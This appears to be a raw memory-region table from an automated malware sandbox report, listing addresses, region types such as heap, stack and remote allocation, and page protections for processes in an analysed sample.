heap
page read and write
1D0B43B8000
heap
page read and write
1D09BA1D000
trusted library allocation
page read and write
1CC73350000
trusted library allocation
page read and write
2487F802000
heap
page read and write
1DFC1E51000
heap
page read and write
2487F813000
heap
page read and write
C35257E000
stack
page read and write
7FFD9BB30000
trusted library allocation
page read and write
2A5B9A63000
heap
page read and write
1CC779C0000
trusted library allocation
page read and write
1D0B4391000
heap
page read and write
1CC77465000
heap
page read and write
1BDBD5C0000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
1D09BDD8000
trusted library allocation
page read and write
1D0B409E000
heap
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
C351D8B000
stack
page read and write
1D099C76000
heap
page read and write
1CC7741F000
heap
page read and write
7FFD9B978000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
1DFC1E94000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
2A5BB73E000
trusted library allocation
page read and write
1DFA7ACE000
heap
page read and write
1D09BA23000
trusted library allocation
page read and write
1DFC1E00000
heap
page read and write
1DFC21D5000
heap
page read and write
1D099F23000
heap
page execute and read and write
C3530FE000
stack
page read and write
1D09BC8F000
trusted library allocation
page read and write
C35317E000
unkown
page readonly
2A5BB6FB000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
1D0B4152000
heap
page read and write
1D0ACFE5000
trusted library allocation
page read and write
1D099CA0000
heap
page read and write
1DFA9962000
trusted library allocation
page read and write
7FFD9B9FD000
trusted library allocation
page read and write
1DFA94E0000
heap
page execute and read and write
1D09BBCF000
trusted library allocation
page read and write
1CC776FC000
trusted library allocation
page read and write
1D09B984000
trusted library allocation
page read and write
C352D7B000
stack
page read and write
1DFC218D000
heap
page read and write
44A1BE1000
stack
page read and write
2A5B9920000
trusted library allocation
page read and write
20ED1A2B000
heap
page read and write
1D09BC80000
trusted library allocation
page read and write
1CC773E0000
trusted library allocation
page read and write
1DFC20EA000
heap
page read and write
745F5F7000
stack
page read and write
1DFA98E0000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
1DFC22C2000
heap
page read and write
1DFA9918000
trusted library allocation
page read and write
1D09BC05000
trusted library allocation
page read and write
1D0B4337000
heap
page read and write
1D0B4126000
heap
page read and write
1D0B4350000
heap
page read and write
1D099C80000
heap
page read and write
1D0B4007000
heap
page read and write
1CC7275C000
heap
page read and write
7FFD9BA45000
trusted library allocation
page read and write
1D0B43FB000
heap
page read and write
19792500000
heap
page read and write
1CC77519000
heap
page read and write
1D0ACC2F000
trusted library allocation
page read and write
1D099B8C000
heap
page read and write
7FFD9B806000
trusted library allocation
page read and write
1DFC2147000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
1D0B448F000
heap
page read and write
1DFA9ADB000
trusted library allocation
page read and write
1978E39C000
heap
page read and write
1DFA7A10000
heap
page read and write
1DFA9829000
trusted library allocation
page read and write
1D0B4471000
heap
page read and write
C352C7E000
unkown
page readonly
7FFD9B9D0000
trusted library allocation
page read and write
1DFA7AA6000
heap
page read and write
7FFD9BA0A000
trusted library allocation
page read and write
2487F800000
heap
page read and write
1D0AB766000
trusted library allocation
page read and write
2A5BB70F000
trusted library allocation
page read and write
1DFC20C3000
heap
page read and write
1D09B944000
trusted library allocation
page read and write
1BDBD702000
heap
page read and write
1D09B6B0000
heap
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
1CC77608000
trusted library allocation
page read and write
1DFC233F000
heap
page read and write
7FFD9B800000
trusted library allocation
page read and write
1D0B43A2000
heap
page read and write
1DFC1EF2000
heap
page read and write
1DFA966F000
trusted library allocation
page read and write
1CC774ED000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1DFA9500000
heap
page read and write
7FFD9B792000
trusted library allocation
page read and write
1DFC2102000
heap
page read and write
1D09BD98000
trusted library allocation
page read and write
2A5B9BB0000
trusted library allocation
page read and write
1D09B9DD000
trusted library allocation
page read and write
2A5B9970000
heap
page read and write
1CC77502000
heap
page read and write
1D0AC878000
trusted library allocation
page read and write
44A27FF000
stack
page read and write
1CC77710000
trusted library allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
1CC77610000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
1D0B4507000
heap
page read and write
1D0B411E000
heap
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
1D09BD54000
trusted library allocation
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
1D0B44BC000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1DFC20D6000
heap
page read and write
1CC72713000
heap
page read and write
D1D46FD000
stack
page read and write
1DFC2332000
heap
page read and write
1404FC000
remote allocation
page execute and read and write
1CC72700000
heap
page read and write
1CC776FF000
trusted library allocation
page read and write
C35407E000
unkown
page readonly
7FF44CBB0000
trusted library allocation
page execute and read and write
20ED1B13000
heap
page read and write
1DFA9A8C000
trusted library allocation
page read and write
74629FA000
stack
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
1D0B412A000
heap
page read and write
B8C59FB000
stack
page read and write
1DFA9B25000
trusted library allocation
page read and write
1CC71E90000
heap
page read and write
1D0B42C9000
heap
page read and write
1CC77508000
heap
page read and write
1D099B80000
heap
page read and write
D1D5DFB000
stack
page read and write
1CC72FB0000
trusted library section
page readonly
7FFD9BB20000
trusted library allocation
page read and write
1DFA9931000
trusted library allocation
page read and write
1D099F40000
heap
page read and write
1DFC22CF000
heap
page read and write
1978FD00000
heap
page read and write
1DFA98DB000
trusted library allocation
page read and write
1DFC1FE5000
heap
page read and write
1D0ACEC8000
trusted library allocation
page read and write
1D0AB7A5000
trusted library allocation
page read and write
1DFB96FF000
trusted library allocation
page read and write
19794300000
heap
page read and write
1DFC1E32000
heap
page read and write
1DFA7AE3000
heap
page read and write
1D09B8A3000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1CC773E6000
trusted library allocation
page read and write
1DFA995B000
trusted library allocation
page read and write
1D09B9B4000
trusted library allocation
page read and write
1DFA9615000
trusted library allocation
page read and write
2A5D4630000
heap
page read and write
745E9FF000
stack
page read and write
1D0B4810000
heap
page execute and read and write
2A5BB51E000
heap
page read and write
1CC77707000
trusted library allocation
page read and write
1D09B899000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1D0ABA5A000
trusted library allocation
page read and write
923EAFE000
stack
page read and write
7FF44CBD0000
trusted library allocation
page execute and read and write
7FFD9B7AD000
trusted library allocation
page execute and read and write
7FFD9BA20000
trusted library allocation
page read and write
1CC7271A000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
1DFC2336000
heap
page read and write
7FFD9BB40000
trusted library allocation
page read and write
2A5B99B1000
heap
page read and write
EA43279000
stack
page read and write
745CECE000
stack
page read and write
1DFC1EDA000
heap
page read and write
1D0B4419000
heap
page read and write
1DFA9AF0000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page execute and read and write
2487F470000
heap
page read and write
1DFA9865000
trusted library allocation
page read and write
1978E290000
heap
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
1DFC22F2000
heap
page read and write
1D09BDFF000
trusted library allocation
page read and write
1CC7771A000
trusted library allocation
page read and write
1CC7271B000
heap
page read and write
1DFA9A77000
trusted library allocation
page read and write
745D9FD000
stack
page read and write
2A5BB410000
unkown
page readonly
7FFD9B9E0000
trusted library allocation
page read and write
1CC72F90000
trusted library section
page readonly
7460DF8000
stack
page read and write
1D09BE48000
trusted library allocation
page read and write
1CC7271A000
heap
page read and write
2A5B99DC000
heap
page read and write
1CC72590000
trusted library section
page read and write
1D09BD45000
trusted library allocation
page read and write
1D0B451E000
heap
page read and write
1D0B43EE000
heap
page read and write
2A5B9953000
trusted library allocation
page read and write
7FFD9BA6B000
trusted library allocation
page read and write
745CE8E000
stack
page read and write
1D0AC5DE000
trusted library allocation
page read and write
1CC71E28000
heap
page read and write
1DFC233B000
heap
page read and write
1D0B430C000
heap
page read and write
1CC77600000
trusted library allocation
page read and write
1CC77770000
remote allocation
page read and write
There are 999 hidden memdumps, click here to show them.